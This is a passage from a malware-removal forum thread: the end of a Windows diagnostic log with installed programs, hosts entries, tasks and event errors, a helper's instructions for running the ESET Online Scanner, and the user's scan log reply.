Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Overland (Version: 2.1.5 - Hewlett-Packard) Hidden
Peggle Deluxe (HKLM\...\Peggle Deluxe) (Version:  - PopCap Games)
Personal Entertainment Launcher (HKLM\...\{37F964E4-9C3F-4066-B933-1747D3AC6737}) (Version: 1.00.0000 - Dell Inc.)
Photo Viewer 2.4 (HKLM\...\Photo Viewer_is1) (Version:  - )
PhotoGallery (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Photosmart 320,370,7400,8100,8400 Series (HKLM\...\{AAC4FC36-8F89-4587-8DD3-EBC57C83374D}) (Version: 2.0 - HP)
PowerDVD (HKLM\...\{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}) (Version: 8.1 - Dell)
Presto! BizCard 4.1 Eng (HKLM\...\Uninstall Presto! BizCard 4.1 Eng) (Version:  - )
PrintScreen (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Product Support Launcher (HKLM\...\{B8ABB25D-1E30-4ED7-A3CE-0F8BED439647}) (Version: 1.00.0000 - Dell Inc.)
PSPrinters06 (Version: 1.00.0000 - HP) Hidden
QFolder (Version: 1.00.0000 - Hewlett-Packard) Hidden
QuickProjects (Version: 43.1.5.000 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Ethernet Network Card Diagnostic tool for Windows Vista (HKLM\...\{1FECF5F8-8E75-432C-9FF7-1C04F1956B54}) (Version: 1.00 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version:  - )
Revo Uninstaller 1.95 (HKLM\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group)
Roxio Activation Module (HKLM\...\{07159635-9DFE-4105-BFC0-2817DB540C68}) (Version: 1.0 - Roxio)
Roxio Creator Audio (HKLM\...\{83FFCFC7-88C6-41C6-8752-958A45325C82}) (Version: 3.5.0 - Roxio)
Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.5.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43A1-AB6C-0F4EE48CE048}) (Version: 3.5.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4C52-84D5-77E344289F87}) (Version: 3.5.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.5.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ED8-B104-03393876DFDF}) (Version: 3.5.0 - Roxio)
Roxio Express Labeler 3 (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 3.2.1 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Samsung New PC Studio (HKLM\...\InstallShield_{F193FC0E-9E18-40FC-A974-509A1BDD240A}) (Version: 1.00.0000 - Samsung Electronics Co., Ltd.)
Samsung New PC Studio (Version: 1.00.0000 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.650.0 - SAMSUNG Electronics Co., Ltd.)
SkinsHP1 (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Sonic CinePlayer Decoder Pack (HKLM\...\{8D337F77-BE7F-41A2-A7CB-D5A63FD7049B}) (Version: 4.2.0 - Sonic Solutions)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TBS WMP Plug-in (HKLM\...\InstallShield_{13515135-48BB-4184-8C1F-2FAE0138E200}) (Version: 1.00.676 - CNN)
TBS WMP Plug-in (Version: 1.00.676 - CNN) Hidden
The Witcher: Enhanced Edition (HKLM\...\Steam App 20900) (Version:  - CD Projekt RED)
TrayApp (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unload (Version: 4.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebReg (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\InprocServer32 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4 (the data entry has 48 more characters).
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{3EC350A7-5C5E-4192-B734-E13722E10914}\InprocServer32 -> C:\Program Files\HP\HP Software Update\HPRulesEngine.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
 
==================== Restore Points  =========================
 
23-03-2015 11:44:32 Scheduled Checkpoint
26-03-2015 10:04:41 Windows Update
30-03-2015 12:03:45 Windows Update
02-04-2015 14:13:17 Windows Update
02-04-2015 18:17:48 Restore Operation
02-04-2015 18:53:53 Windows Update
02-04-2015 19:35:07 Windows Update
06-04-2015 12:53:05 Windows Update
08-04-2015 12:51:35 Scheduled Checkpoint
10-04-2015 16:46:36 Windows Update
11-04-2015 22:42:05 Removed iTunes
11-04-2015 22:46:02 Removed Bonjour
11-04-2015 22:49:56 Installed iTunes
12-04-2015 17:59:00 Windows Modules Installer
13-04-2015 13:03:15 Scheduled Checkpoint
13-04-2015 14:20:32 Revo Uninstaller's restore point - Coupon Printer for Windows
13-04-2015 14:22:36 Revo Uninstaller's restore point - Reimage Repair
13-04-2015 14:25:16 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:27:26 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:28:08 Revo Uninstaller's restore point - Shopping Helper Smartbar Engine
13-04-2015 21:06:33 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2015-04-12 20:17 - 00451469 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 www.007guard.com
127.0.0.1 007guard.com
127.0.0.1 008i.com
127.0.0.1 www.008k.com
127.0.0.1 008k.com
127.0.0.1 www.00hq.com
127.0.0.1 00hq.com
127.0.0.1 010402.com
127.0.0.1 www.032439.com
127.0.0.1 032439.com
127.0.0.1 www.0scan.com
127.0.0.1 0scan.com
127.0.0.1 1000gratisproben.com
127.0.0.1 www.1000gratisproben.com
127.0.0.1 www.1001namen.com
127.0.0.1 1001namen.com
127.0.0.1 www.100888290cs.com
127.0.0.1 100888290cs.com
127.0.0.1 www.100sexlinks.com
127.0.0.1 100sexlinks.com
127.0.0.1 www.10sek.com
127.0.0.1 10sek.com
127.0.0.1 www.1-2005-search.com
127.0.0.1 1-2005-search.com
127.0.0.1 123haustiereundmehr.com
127.0.0.1 www.123haustiereundmehr.com
127.0.0.1 www.123simsen.com
127.0.0.1 123simsen.com
 
There are 1000 more lines.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {15B98890-7862-4EB6-9F04-C86AA4B30ED3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {2B5725B7-C8CD-4C44-A84A-2D3E3C842E53} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-19] (Realtek)
Task: {2C62F3F5-FBF2-4876-9A8D-8BE4F136FB64} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {3BBA328E-4379-4529-B561-54BA6D774C55} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {3CAD3FE6-5704-4E5F-8796-36F6155E7BD5} - System32\Tasks\{597FAF1C-9F17-4FBC-917E-BDCD12142EB5} => pcalua.exe -a E:\setup.exe -d E:\
Task: {6586E20B-2210-4C87-8DA3-941E7CCB4C11} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {70A81FD7-F19C-48EF-B9A2-057CE879CF79} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-04] (Adobe Systems Incorporated)
Task: {7CDC9FA6-084D-42D0-9D11-267A98778EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {8B2810B7-292B-4C79-9C55-05F873DF7A5F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {ED5063D5-5DB8-447F-98FF-1F9CF2EBBDE0} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: {FAFBC4FC-F442-4283-B32F-F0F4D650782F} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDImmunize.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-09-29 09:15 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-09-29 09:15 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-09-29 09:15 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2015-01-06 08:18 - 2015-01-06 08:18 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 03391488 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a87a9960\mscorlib.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 03035136 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.windows.forms\1.0.5000.0__b77a5c561934e089_6eec51ce\system.windows.forms.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 01966080 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_3b70900d\system.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 00843776 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.drawing\1.0.5000.0__b03f5f7f11d50a3a_318f459e\system.drawing.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 02088960 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.xml\1.0.5000.0__b77a5c561934e089_c7963648\system.xml.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angel\AppData\Roaming\Microsoft\Windows Live Photo Gallery\Windows Live Photo Gallery Wallpaper.jpg
DNS Servers: 192.168.1.254
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1464855766-1936325176-3098395914-500 - Administrator - Disabled)
Angel (S-1-5-21-1464855766-1936325176-3098395914-1000 - Administrator - Enabled) => C:\Users\Angel
ASPNET (S-1-5-21-1464855766-1936325176-3098395914-1002 - Limited - Enabled)
Guest (S-1-5-21-1464855766-1936325176-3098395914-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/14/2015 11:44:48 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/14/2015 11:37:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application notepad.exe, version 6.0.6001.18000, time stamp 0x47918ea2, faulting module gdiplus.dll_unloaded, version 0.0.0.0, time stamp 0x54c99538, exception code 0xc0000005, fault offset 0x73ff74b2,
process id 0x1388, application start time 0xnotepad.exe0.
 
Error: (04/14/2015 11:27:27 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 08:54:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 03:36:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:36:00 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:28:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:27:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:25:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:22:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
 
System errors:
=============
Error: (04/14/2015 11:43:28 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.
 
New Signature Version: 
 
Previous Signature Version: 1.195.3225.0
 
Update Source: %NT AUTHORITY59
 
Update Stage: 4.7.0205.00
 
Source Path: 4.7.0205.01
 
Signature Type: %NT AUTHORITY602
 
Update Type: %NT AUTHORITY604
 
User: NT AUTHORITY\SYSTEM
 
Current Engine Version: %NT AUTHORITY605
 
Previous Engine Version: %NT AUTHORITY606
 
Error code: %NT AUTHORITY607
 
Error description: %NT AUTHORITY608
 
Error: (04/14/2015 11:43:09 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: 1Restart the serviceWindows Search%%1056
 
Error: (04/14/2015 11:42:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search1300001Restart the service
 
Error: (04/14/2015 11:42:25 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Software Licensing11200001Restart the service
 
Error: (04/14/2015 11:39:39 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: 1Restart the serviceSpybot-S&D 2 Scanner Service%%1056
 
Error: (04/14/2015 11:39:26 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {9E175B6D-F52A-11D8-B9A5-505054503030}
 
Error: (04/14/2015 11:38:37 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Scanner Service1600001Restart the service
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Bonjour Service1
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Apple Mobile Device1600001Restart the service
 
Error: (04/14/2015 11:38:36 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Intel® Matrix Storage Event Monitor1
 
 
Microsoft Office Sessions:
=========================
Error: (03/26/2014 06:52:30 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 8129 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 17 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:48:48 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2505 seconds with 1020 seconds of active time.  This session ended with a crash.
 
Error: (03/12/2014 09:18:57 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 14721 seconds with 6540 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 07:23:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 19238 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 02:02:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 284 seconds with 180 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 01:56:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 9327 seconds with 2760 seconds of active time.  This session ended with a crash.
 
Error: (09/30/2013 08:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5001, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2015-04-14 23:47:54.422
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:54.156
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.907
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.642
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:53.064
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.815
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.550
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:52.206
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:28.569
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-14 23:47:28.304
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7300 @ 2.66GHz
Percentage of memory in use: 62%
Total physical RAM: 3036.26 MB
Available physical RAM: 1125.52 MB
Total Pagefile: 6287.5 MB
Available Pagefile: 4284.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1912.54 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:288.04 GB) (Free:158.25 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:4.79 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: 38000000)
Partition 1: (Not Active) - (Size=55 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=288 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#6 deeprybka

deeprybka

  • Malware Response Team
  • 5,198 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:12:30 PM

Posted 15 April 2015 - 06:21 AM

:thumbup2:

Step 1

Please downloadesetlogo.pngOnline Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start installer.pngwith administartor privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings:
settings.png
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed, click on Finish.
  • A log filelog.pngis created at logpath.png
    Copy and paste the content of this log file in your next reply.
esetlog.png

Note: Do not forget to re-enable your antivirus application after running the above scan!
eset.gif


lesestoff.png

Can you please tell me which problems still persist now?
regards,
deeprybka
:busy:
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
 
unite_blue.png
asap.png

#7 SereneSnake

SereneSnake
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:04:30 AM

Posted 16 April 2015 - 02:19 AM

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=10b2dafc2ff4a5459f825eb6e4fcaf00
# engine=23408
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2015-04-16 06:04:30
# local_time=2015-04-16 01:04:30 (-0600, Central Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='Microsoft Security Essentials'
